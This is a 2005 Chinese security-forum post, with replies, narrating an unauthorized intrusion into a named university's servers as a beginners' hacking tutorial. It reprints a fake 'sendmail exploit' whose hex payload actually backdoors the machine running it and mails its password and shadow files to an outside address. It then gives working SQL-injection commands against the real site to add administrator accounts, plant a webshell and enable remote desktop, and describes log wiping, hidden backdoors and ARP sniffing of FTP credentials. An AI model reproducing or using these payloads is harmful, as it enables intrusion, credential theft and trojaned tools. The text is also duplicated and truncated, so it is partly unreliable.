北方工业大学被黑内幕

[原创]北方工业大学被黑内幕

文章标题:[原创]北方工业大学被黑内幕顶部 恶猫 发布于:2005-07-1902:30 [楼主][原创]北方工业大学被黑内幕

文章作者:恶猫[E.S.T](EvilCat[E.S.T])

文章来源:邪恶八进制信息安全团队(www.eviloctal.com)

前言:

回想起当初,认识冰血到进入邪恶八进制做beginner版主,到现在已经正正一年了.看到八进制在冰血的管理和领导下,蒸蒸Ri上,论坛里大家讨论的技术越来越有水平,大家的原创作品的水平也越来越接近专业安全,自己心理也是十分高兴..但照顾小菜鸟”Hacking”的文章相对就少许多了,今天我来专门写一篇专门照顾菜鸟的文章,如果您已经是老鸟了,就不必看此篇文章了,因为此文是为菜鸟量身打造.文章思路借鉴了小路的>在此感谢小路在无私共享的黑客精神.好了,废话不多说了Let’sbegin~~

正文:

北方工业大学是北京一所工科大学,当时答应过我一个朋友(不是女朋友呦~~~)争取在她毕业前拿下她学校(北方工业大学)的主页,后来我只对她学校的网站做了简单的踩点,竟然发现主机是SunOS,这下还真有点难度,由于自己那时的水平有限,而且自己也有学业要忙,就把这件事暂时搁置了,后来半年多后她再次想我提起这件事,我决定好好帮她分析一下.于是我和我在那个学校的一位朋友也是一位同行,开始对这所学校展开了测试.我用X-Scan仔细扫描了一下这个站点,发现主机开放21,25,80端口其他端口没有开放,在看看网站是否存在脚本问题,晕,竟然网页都是静态的,没有动态页面,这个入侵带来了更大的困难.令人庆幸的是主机开放25端口,而且用邮件服务程序用的是sendmail,X-Scan扫描报告上显示具有sendmail由于版本过低,具有remoteexploit的可能.于是我赶快在google中搜索了一下针对SunOS的sendmail溢出程序,真不容易竟然被有找到了源码如下

Copycode

/*

###############################################################################

!!!PRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATE!!!

###############################################################################

~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~

~~~~~~~~~~~~~~~~~~~~~~

~|~ Sendmail

~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~

~~~~~~~~~~~~~~~~~~~~~~

by0wN-U,[email][email protected][/email]

Exploitfornewsendmailvulnerability-discoveredagain-byMichalZalewski.

securityfocuslink:[url]http://www.securityfocus.com/archive/1/337839[/url] 

Thisexploitwillworkagainstsendmail

###>>>Ifeverythingisok,youwillfindshellontargetbox,port31337

NOTE:Thisexploitisverypowerful,andonlyrootcanuseit.

Haveanicetimewiththisexploit;-).

>>>>>>>>>>>>YOUSHOULDNOTHAVETHIS0daySENDMAILWAREZ!!!!

THISISVERYPRIVATE,DONOTDISTRIBUTE!!!.

-propstol33tT(),r3t4rd,n0b0dy,gopulg-etandmebej(U-stupid-l4mer;-)

-dropstowhitehats^H^H^H^Hsuckz;-)))

###############################################################################

!!!PRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATE!!!

###############################################################################

*/

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#defineSMTPPORT25

/* improvedtcpport(31337)bindshellcode*/

charasmcode[]=

"\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"

"\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68"

"\x75\x6e\x3b\x65\x63\x68\x6f\x20\x24\x55\x53\x45\x52\x20\x24\x4f\x53"

"\x54\x59\x50\x45\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e"

"\x3b\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"

"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e"

"\x70\x68\x75\x6e\x3b\x75\x6e\x61\x6d\x65\x20\x2d\x61\x20\x3e\x3e\x20"

"\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b\x65\x63\x68\x6f\x20\x22\x2d"

"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22"

"\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b\x69\x66\x63"

"\x6f\x6e\x66\x69\x67\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75"

"\x6e\x3b\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"

"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f"

"\x2e\x70\x68\x75\x6e\x3b\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x68\x6f"

"\x73\x74\x73\x20\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e"

"\x3b\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"

"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e"

"\x70\x68\x75\x6e\x3b\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73"

"\x73\x77\x64\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b"

"\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"

"\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70"

"\x68\x75\x6e\x3b\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64"

"\x6f\x77\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b\x65"

"\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"

"\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68"

"\x75\x6e\x3b\x63\x61\x74\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x20"

"\x7c\x20\x6d\x61\x69\x6c\x20\x68\x34\x78\x30\x72\x68\x34\x78\x33\x72"

"\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3b\x65\x63\x68\x6f"

"\x20\x62\x67\x70\x20\x20\x73\x74\x72\x65\x61\x6d\x20\x20\x74\x63\x70"

"\x20\x20\x20\x20\x20\x6e\x6f\x77\x61\x69\x74\x20\x20\x72\x6f\x6f\x74"

"\x20\x20\x20\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2f\x62\x69\x6e\x2f"

"\x73\x68\x20\x2d\x69\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x69\x6e\x65"

"\x7

4\x64\x2e\x63\x6f\x6e\x66\x3b\x6b\x69\x6c\x6c\x61\x6c\x6c\x20\x2d"

"\x48\x55\x50\x20\x69\x6e\x65\x74\x64\x3b\x63\x70\x20\x2f\x62\x69\x6e"

"\x2f\x73\x68\x20\x2f\x74\x6d\x70\x2f\x2e\x67\x6f\x74\x69\x74\x2d\x24"

"\x55\x53\x45\x52\x3b\x63\x68\x6d\x6f\x64\x20\x34\x37\x37\x37\x20\x2f"

"\x74\x6d\x70\x2f\x2e\x67\x6f\x74\x69\x74\x2d\x24\x55\x53\x45\x52\x3b"

"\x65\x63\x68\x6f\x20\x30\x77\x6e\x75\x3a\x3a\x30\x3a\x30\x3a\x30\x77"

"\x6e\x75\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20"

"\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x3b\x70\x77"

"\x63\x6f\x6e\x76\x3b";

intrev(inta){

 inti=1;

 if((*(char*)&i))return(a);

 return((a>>24)&0xff)|(((a>>16)&0xff)>8)&0xff)

}

charmsg[]="0dayHACKINGw4r3z!!!";

intmain(intargc,char**argv){

 structhostent*hp;

 structsockaddr_inadr;

 charbuffer[1024],*b,*ls=asmcode;

 intcount;

 inti,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;

 

 printf("-------------------------------------------------------\n");

 printf("PRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATE\n");

 printf(">>>SENDMAIL

 printf("PRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATE\n");

 printf("-------------------------------------------------------\n");

 

 if(getuid()!=0)

 {

  printf("Sorry!!!\n");

  printf("Thisisverydangerousexploitforwholeinternet,andthat'swhyonlyrootuserscanuseit!!!\n");

  printf("Sorrykiddies:-))))\n");

  exit(0);

 }

 if(argc

  printf("USAGE:%saddressportnumtype\n",argv[0]);

  printf("address-targetaddress\n");

  printf("portnum-shouldbe25\n");

  printf("type-linux,openbsd,freebsd,netbsd,sunos\n");

  system(ls);exit(-1);

 }

 

 while((c=getopt(argc-1,&argv[1],"se"))!=-1){

   switch(c){

   case's':flag=1;break;

   case'e':flag=2;

   }

 }

 

 sck[0]=socket(AF_INET,SOCK_DGRAM,0);

 sck[1]=socket(AF_INET,SOCK_STREAM,0);

 printf("o Exploitingsendmailon%s-waitforr00tshell..",argv[1]);

 system(ls);for(count=0;count

 {printf(".");fflush(stdout);sleep(1);}

 adr.sin_family=AF_INET;

 adr.sin_port=htons(53);

 if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){

   if((hp=gethostbyname(argv[1]))==NULL){

   }

 }

 if(connect(sck[0],(structsockaddr*)&adr,sizeof(adr))

 if(connect(sck[1],(structsockaddr*)&adr,sizeof(adr))

 printf("\no Exploitfailed:-(((,trytorunitonanothermachine!!!\n");

 exit(-1);

 i=sizeof(structsockaddr_in);

 if(getsockname(sck[1],(structsockaddr*)&adr,&i)==-1){

   structnetbuf{unsignedintmaxlen;unsignedintlen;char*buf;};

   structnetbufnb;

   ioctl(sck[1],(('S'

   nb.maxlen=0xffff;

   nb.len=sizeof(structsockaddr_in);;

   nb.buf=(char*)&adr;

   ioctl(sck[1],(('T'

 }

 n=ntohs(adr.sin_por

t);

 asmcode[4+48+2]=(unsignedchar)((n>>8)&0xff);

 asmcode[4+48+3]=(unsignedchar)(n&0xff);

 if(write(sck[0],msg,sizeof(msg))==-1)gotoerr;

 if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1)gotoerr;

 

 printf("stackdump:\n");

 for(i=0;i

   printf("%s%02x",(i&(!(i%16)))?"\n":"",(unsignedchar)buffer[512+i]);

 }

 printf("\n\n");

 fp=rev(*(unsignedint*)&buffer[532]);

 ofs=(0xfe)-((fp-(fp&0xffffff00))&0xff);

 cnt=163;

 if((buffer[512+20+2]!=(char)0xff)&(buffer[512+20+3]!=(char)0xbf)){

   printf("systemdoesnotseemtobeavulnerablelinux\n");exit(1);

 }

 if(flag==1){

   printf("systemseemstoberunningsendmail,OK:-)\n");exit(-1);

 }

 if(cnt

   printf("frameptristoolowtobesuccessfullyexploited\n");exit(-1);

 }

 jmp=rev(fp-586);

 ptr6=rev((fp&0xffffff00)-12);

 fp=rev(fp&0xffffff00);

 printf("frameptr=0x%08xadr=%08xofs=%d",rev(fp),rev(jmp),ofs);

 printf("port=%04xconnected!",(unsignedshort)n);fflush(stdout);

 b=buffer;

 memcpy(b,"\xab\xcd\x01\x00\x00\x02\x00\x00\x00\x00\x00\x01",12);b+=12;

 for(i=0;i

 for(i=0;i>1);i++,b++)*b++=0x01;

 memcpy(b,"\x00\x00\x01\x00\x01",5);b+=5;

 for(i=0;i>1);i++,b++)*b++=0x01;

 *b++=28;

 memcpy(b,"\x06\x00\x00\x00",4);b+=4;

 memcpy(b,&fp,4);b+=4;

 memcpy(b,"\x06\x00\x00\x00",4);b+=4;

 memcpy(b,&jmp,4);b+=4;

 memcpy(b,&jmp,4);b+=4;

 memcpy(b,&fp,4);b+=4;

 memcpy(b,&ptr6,4);b+=4;

 cnt-=ofs+28;

 for(i=0;i>1);i++,b++)*b++=0x01;

 memcpy(b,"\x00\x00\x01\x00\x01\x00\x00\xfa\xff",9);b+=9;

 if(write(sck[0],buffer,b-buffer)==-1)gotoerr;

 sleep(1);printf("sent!\n");

 write(sck[1],"/bin/uname-a\n",14);

 while(1){

   fd_setfds;

   FD_ZERO(&fds);

   FD_SET(0,&fds);

   FD_SET(sck[1],&fds);

   if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){

     intcnt;

     charbuf[1024];

     if(FD_ISSET(0,&fds)){

       if((cnt=read(0,buf,1024))

         if(errno==EWOULDBLOCK||errno==EAGAIN)continue;

         elsebreak;

       }

       write(sck[1],buf,cnt);

     }

     if(FD_ISSET(sck[1],&fds)){

       if((cnt=read(sck[1],buf,1024))

         if(errno==EWOULDBLOCK||errno==EAGAIN)continue;

         elsebreak;

       }

       write(1,buf,cnt);

     }

   }

 }

 exit(0);

err:

 perror("error");exit(-1);

}

据说这个版本的溢出程序是所有sendmail溢出程序中成功率最高的.我赶快用gcc编译(若自己是windows操作统可以安装Cygwin,然后即可编译此溢出程序)

进入Cygwin然后输入gcc–oSendmailSendmail.C编译成功,然后按照溢出程序使用方法测试主站.输入Sendma

ilwww.ncut.edu.cn25,回车…….哎竟然失败了…….真是让人失望(我还是把源码放出来供同行使用,也许你测试的主机可以成功).看来此路不同,只能另想办法了.我苦思了一阵,恩,有思路了(下文我会详细的讲给大家).由于自己不在这所学校,在加上要考CET4所以我把我的思路和身在此学校的一位朋友交流了一下,然后此事再次被我搁置了,想考完试再说吧.后来几个月过后,听说这位朋友已经成功了,然后又发生了些事我就不提了,扫兴.总之还是得自己动手.这时候浏览这所学校主页的时候,直觉告诉我好像已经有网页木马了,用ie查看源码一看,哈哈,使用的竟然事咱们冰狐浪子大哥的网页木马.好了,现在就让我就来揭开这所大学被黑的内幕.

当时想出的能够黑掉这台SunOS的思路就是找同网段比较脆弱的机器当然最好是windows,从他的邻居下手,呵呵.(这种技术老鸟早已掌握了,所以再次重申此文是为菜鸟所写)然后通网段嗅探主机的ftp密码.当时我搁置此事的原因还有就是这个学校同网段的机器一般就屏蔽了外网IP,这样入侵起来极不方便,幸好我家离这所学校不远……好的,现在就让我们开工.

拿出我最喜欢的PortReady1.6扫描器,这个软件不尽开源而且扫描速度相当快.八进制这里有下载(51楼)

http://www.eviloctal.com/forum/read.php?fid=23&tid=4450&fpage=1&toread=&page=6

我们先来pingwww.ncut.edu.cn

得到主机IP为202.204.24.37,然后用PortReady1.6扫从202.204.24.1到202.204.24.255,只扫80端口.这样比较快.看看80端口返回的banner.如果是IIS5.0赶快用ie浏览一下如果再是asp的页面呵呵,那我就中奖了.扫完后发现符合要求的只有两台机器202.204.24.45和202.204.24.16.好先让我们看看202.204.24.45这台机器吧,这台机器有一个asp的”意见征集”系统,telnet202.204.24.451433显示1433端口关闭.然后我在用户登陆系统中试着填写.

用户名:admin密码:’or’’=’哈哈,竟然进去了,还别高兴的太早,里面一看原来好多页面好像已经别先进来的那个朋友删除了(可能是为了防止我进来吧),我telnet202.204.24.453389一看,3389开放,看来确实有人来过了.好还还有一台机器,说明还是有希望的.用ie打开202.204.24.16一看原来是个asp的考试系统,这回我美了哈哈.我找了注入点然后用NBSI2开始测试.关于注入点的寻找和手动测试权限,以及注入防范请见这里

http://www.eviloctal.com/forum/read.php?tid=998

小竹写的著名的”SQL注入天书”.

我找到的注入点为

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1

用NBSI2测试后发现数据库为sqlserver而且权限是sa.哈哈,天助我也.我赶快加帐户,然后开启对方3389.

在ie中输入

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'netuserEvilCatestwebserver/add&#

39;—

然后将EvilCat提升为管理员

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsEvilCat/add'—

接着就是开3389了

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'echo[Components]>c:\EvilCat'—

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'echoTsEnable=on>>c:\EvilCat'—

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'sysocmgr/i:c:\winnt\inf\sysoc.inf/u:c:\EvilCat/q'—

成功的主机会开启3389而且会自动重启.

输入完后发现目标主机没有重启,真是叫人郁闷.算了,条条大路通罗马.我还是令想办法吧.这时我想起了开3389小工具,Open3389而且是开放源码的,论坛这里有下载,

http://www.eviloctal.com/forum/read.php?tid=7970

由于这个程序已经被列入病毒行列所以只好自己修改一下再编译,编译后用压缩软件加壳如udpshell这样程序会比较小,便于传输.再这里提示一句(注册为八进制会员后,会开启搜索功能,只要在搜索栏中输入关键字,你想要找的资料是很好找到的)

修改好程序后结下来就是文件传输了,文件传输的方法不只一种,比如ipc,tftp,ftp等,论坛里很早就讨论过了.自己搜索即可.我个人比较用webshell来传输文件,虽然不能传输很大的文件.得到webshell的放法如果是db_owner常用的是backupashell,菜鸟可以使用小路写的工具来获得,论坛这里有下载http://www.eviloctal.com/forum/read.php?tid=7891.关于原理,请看安全天使主页SuperHei的那几篇文章.这里既然是sa权限我们可以echoashell,具体做法如下:

我们先要得到网站的绝对路径

我们可以通过读取注册表的方法来获得,

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1;DECLARE%20@result%20varchar(255)%20EXEC%20master.dbo.xp_regread%20'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual%20Roots',%20'/',%20@result%20output%20insert%20into%20temp%20(tmp)%20values(@result);--

当然后还有许多方法.如通过xp_dirtree存储过程得到绝对路进..

这里为了速度用NBSI2自动读取即可.

得到绝对路进为:

E:\www\asp\

然后写入一个一句话后门.

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'echo^""thenexecuterequest("a")%25^>>E:\www\asp\cat.asp'—

然后再次利用一句活后门写入一个海洋之类的,强大的后门.

一句话后门在八进制论坛自己搜索即可.

用海洋网页木马上传然后在ie中输入

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'E:\www\asp\3389.exe'—

结果主机还是没有重启,哎~~这种现象其实我不只遇到一次了,凭经验主机的只要重启必会开起3389

,因为程序已经自动设置注册表了,只不过没有重启.

办法还是有的,就是上传shutdown.exe这个程序是微软自己写的如果你是xp系统,这个程序就位于C:\WINDOWS\system32下.用webshell传上去后在ie中输入

http://eol.ncut.edu.cn/asp/admindatabaseedit.asp?id=1';execmaster.dbo.xp_cmdshell'E:\www\asp\shutdown.exe/R/T0'—

哈哈这回它终于重启了.重启后果然开放了3389,赶快用3389连接器连上去然后克隆一个管理员帐号,清除Ri志,修补注入漏洞,如果为了省事,就用现在的一些防注入程序即可,然后将sqlserver运行于低权限.重要的还有要留一个后门呵呵,用一般的后门容易被发现,用rootkit也经常被杀毒软件所杀.我还是自己想想办法吧

咱们来一个无文件,无端口,无进程,无启动项,无…..反正该有的都没有只具有系统权限的后门(有点夸张了),这个后门我相信杀毒软件这辈子是没戏查到它了,哈哈.不知道你还记得如何在IIS中建立一个隐藏目录吗?不知道的看这里http://www.eviloctal.com/forum/read.php?tid=7244,有工具还有动画.你还记得黑哥这篇>地址:http://www.4ngel.net/article/33.htm

特别要注意的是我们在建立隐藏的虚拟目录的时候要将,应用程序保护设为低,这样如果隐藏的目录下有一个webshell的话它可是系统权限,而且还要按照>一文所说的来配置那个即将隐藏的虚拟目录.这样我们就可以随时利用iis这个”漏洞”传送文件到那个隐藏的虚拟目录而且传上的asp木马还具有系统权限.这样一来我们是没有必要在这个隐藏的虚拟目录下放任何文件的.须要后门时用>中提供的工具送上去即可.但是要注意的是用这个种方法传送文件会在Ri志中留下记录,隐藏的虚拟目录也会暴露,所以每用一次记得要清理Ri志呀,这样以来完全可以在我们完成任务后卸载3389.

接下来就要嗅探这所大学的主站了ftp了.具体做法如下:

在3389中下载arpsniffer.exe榕哥的交换环境下嗅探工具,然后还要安装嗅探所要用到的驱动程序WinPcap.exe,为了方便大家,我在附件中将这两件工具打包提供下载.

安装好winpacap2.1驱动后最好让主机重启,避免发生错误.

重启后,在命令行下输入ipconfig查看这个网段的网关地址.在命令行下输入

arpsniffer.exe202.204.24.254202.204.24.3721C:\WINDOWS\system32\log.txt1

这里202.204.24.254是网关,202.204.24.37是北方工业大学的主站ip地址.如果成功嗅探到主机的ftp密码会在C:\WINDOWS\system32\log.txt生成文件.当然为了安全,我们可以像小路在>中所说的那样,在webshell中启动arpsniffer.现在我们要做的就是等学校主站的管理员登陆ftp了.入侵也到了尾声.好了,我就写到这里了.文章中有什么

不懂的可以在八进制论坛直接与我交流,或者用论坛的搜索程序自己搜索相关内容.

后记:

其实,我记得这台主机的同网段还有一台linux有个phpbb论坛,用phpbb当时的那个写入一个webshell的漏洞,写入一个php的shell然后wget一个绑定端口的后门然后gcc编译,然后装上这个绑定端口的后门,连接这个低权限的后门,然后uname-r看看内核版本,上google找对应的localexploit,wget下载gcc编译然后exploit,得到root,然后再装rootkit,接着装个sniffer嗅探是一样的.当初我也实验了.听说那台202.204.24.45进后台有上传漏洞,即便没有上传,暴出数据库看看是不是asp的若是那么就利用改mdb为asp带来的灾难中说的方法,就成了,由于ftp是servu也是可以localexploit的这些东西对于老鸟绝对可以一笔带过的.我先选择同网段的这台windows作为第一个攻击目标因为很快就能达到我的目的,也比较省事,我想换成是您,您也会选择最脆弱的机器下手.当初和冰血讨论是否写这篇文章,我们觉得适合beginner的文章好像少了,就有了这篇文章.

[此贴被恶猫在07-19-200516:43重新编辑]

附件:arpsni5.zip(872K)下载次数:142顶部 kevin1986 发布于:2005-07-1908:54 [1楼]

其实从Web\SQLHack到Arpsniff的技术都是通用的,和主机类型没有特别的关系.

还有,并非所有的Web-Database都是在同一个交换机下面的,拿下DatabaseHOST之后,需要Tracert或者Ping一下,来判断猜测是否是正确的..求个快,不如求个稳顶部 blackhorse 发布于:2005-07-1909:29 [2楼]

菜鸟也玩SunOS

hoho~!~有误导的嫌疑哦.

还有最终ftp拿到没?

拿到后是否能提权?

...期待后文...顶部 恶猫 发布于:2005-07-1911:13 [3楼]

Quote:

下面是引用kevin1986于07-19-200508:54发表的:

其实从WebSQLHack到Arpsniff的技术都是通用的,和主机类型没有特别的关系.

还有,并非所有的Web-Database都是在同一个交换机下面的,拿下DatabaseHOST之后,需要Tracert或者Ping一下,来判断猜测是否是正确的..求个快,不如求个稳

呵呵,我前面已经说有人成功了,说明确实是位于同一交换机下,关于用tracert命令来判断,是我没有写清楚,谢谢kevin1986补充,还有文章是面向菜鸟,还有就是文章是揭密性质的......顶部 virgo霜风 发布于:2005-07-1912:14 [4楼]

本文题目与内容有点不符啊

题目感觉是要教大家机遇SUNOS的入侵技术但这里只是简单的SQLINJECTION和ARPSNIFFER有点文不对题顶部 EvilCat 发布于:2005-07-1912:20 [5楼]

Quote:

下面是引用virgo霜风于07-19-200512:14发表的:

本文题目与内容有点不符啊

题目感觉是要教大家机遇SUNOS的入侵技术但这里只是简单的SQLINJECTION和ARPSNIFFER有点文不对题

谢谢,霜风指正,没错是简单的注入和sniffer,但是目的是不一样的.由于我学识肤浅,我了解的

能够碰到只有静态页面的sunos就这么一招了,自己也不会发现unix的remoteexploit.欢迎老鸟来拍砖,觉得文章实在是垃圾我马上删帖顶部 EvilCat 发布于:2005-07-1912:48 [6楼]

Quote:

下面是引用十四郎于07-19-200512:44发表的:

感觉不错

但我还是不是很明白

谢谢,楼上支持,我要是再写的简单一些,估计我就被人拍死了......

楼上要是对hacking比较感兴趣,推荐读一读"攻防技术"的子版"脚本安全攻与防"看看早期的一些文章.顶部 EvilCat 发布于:2005-07-1912:50 [7楼]

Quote:

下面是引用reject于07-19-200512:48发表的:

呵呵,文章写的不错`就是这标题....

好的,应楼上要求我把标题改掉,在这里也向大家道歉了

由原来的>

改为>顶部 sunlion 发布于:2005-07-1913:17 [8楼]

写得不错的,呵呵,鼓励一下!思路很快阔、大家不要只是看到结果,其实作者在文章中提到的很多思路,是很实用的,大家应该仔细的多看两篇(对与菜鸟而言,其实我也是一个菜鸟),真的里面的思路真的不错,呵呵,鼓励一下!:)顶部 yezhan 发布于:2005-07-1913:55 [9楼]

安装好winpacap2.1驱动后最好让主机重启,避免发生错误

我关心的是

怎么实现的?(c)Copyleft2003-2007,EvilOctalSecurityTeam.

ThisfileisdecompiledbyanunregisteredversionofChmDecompiler.

Regsiteredversiondoesnotshowthismessage.

YoucandownloadChmDecompilerat:http://www.zipghost.com/

[原创]北方工业大学被黑内幕

文章标题:[原创]北方工业大学被黑内幕顶部 恶猫 发布于:2005-07-1902:30 [楼主][原创]北方工业大学被黑内幕

文章作者:恶猫[E.S.T](EvilCat[E.S.T])

文章来源:邪恶八进制信息安全团队(www.eviloctal.com)

前言:

回想起当初,认识冰血到进入邪恶八进制做beginner版主,到现在已经正正一年了.看到八进制在冰血的管理和领导下,蒸蒸Ri上,论坛里大家讨论的技术越来越有水平,大家的原创作品的水平也越来越接近专业安全,自己心理也是十分高兴..但照顾小菜鸟”Hacking”的文章相对就少许多了,今天我来专门写一篇专门照顾菜鸟的文章,如果您已经是老鸟了,就不必看此篇文章了,因为此文是为菜鸟量身打造.文章思路借鉴了小路的>在此感谢小路在无私共享的黑客精神.好了,废话不多说了Let’sbegin~~

正文:

北方工业大学是北京一所工科大学,当时答应过我一个朋友(不是女朋友呦~~~)争取在她毕业前拿下她学校(北方工业大学)的主页,后来我只对她学校的网站做了简单的踩点,竟然发现主机是SunOS,这下还真有点难度,由于自己那时的水平有限,而且自己也有学业要忙,就把这件事暂时搁置了,后来半年多后她再次想我提起这件事,我决定好好帮她分析一下.于是我和我在那个学校的一位朋友也是一位同行,开始对这所学校展开了测试.我用X-Scan仔细扫描了一下这个站点,发现主机开放21,25,80端口其他端口没有开放,在看看网站是否存在脚本问题,晕,竟然网页都是静态的,没有动态页面,这个入侵带来了更大的困难.令人庆幸的是主机开放25端口,而且用邮件服务程序用的是sendmail,X-Scan扫描报告上显示具有sendmail由于版本过低,具有remoteexploit的可能.于是我赶快在google中搜索了一下针对SunOS的sendmail溢出程序,真不容易竟然被有找到了源码如下

Copycode

/*

###############################################################################

!!!PRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATE!!!

###############################################################################

~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~

~~~~~~~~~~~~~~~~~~~~~~

~|~ Sendmail

~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~

~~~~~~~~~~~~~~~~~~~~~~

by0wN-U,[email][email protected][/email]

Exploitfornewsendmailvulnerability-discoveredagain-byMichalZalewski.

securityfocuslink:[url]http://www.securityfocus.com/archive/1/337839[/url] 

Thisexploitwillworkagainstsendmail

###>>>Ifeverythingisok,youwillfindshellontargetbox,port31337

NOTE:Thisexploitisverypowerful,andonlyrootcanuseit.

Haveanicetimewiththisexploit;-).

>>>>>>>>>>>>YOUSHOULDNOTHAVETHIS0daySENDMAILWAREZ!!!!

THISISVERYPRIVATE,DONOTDISTRIBUTE!!!.

-propstol33tT(),r3t4rd,n0b0dy,gopulg-etandmebej(U-stupid-l4mer;-)

-dropstowhitehats^H^H^H^Hsuckz;-)))

###############################################################################

!!!PRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATEPRIVATE!!!

###############################################################################

*/

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#defineSMTPPORT25

/* improvedtcpport(31337)bindshellcode*/

charasmcode[]=

"\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"

"\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68"

"\x75\x6e\x3b\x65\x63\x68\x6f\x20\x24\x55\x53\x45\x52\x20\x24\x4f\x53"

"\x54\x59\x50\x45\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e"

"\x3b\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"

"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e"

"\x70\x68\x75\x6e\x3b\x75\x6e\x61\x6d\x65\x20\x2d\x61\x20\x3e\x3e\x20"

"\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b\x65\x63\x68\x6f\x20\x22\x2d"

"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22"

"\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b\x69\x66\x63"

"\x6f\x6e\x66\x69\x67\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75"

"\x6e\x3b\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"

"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f"

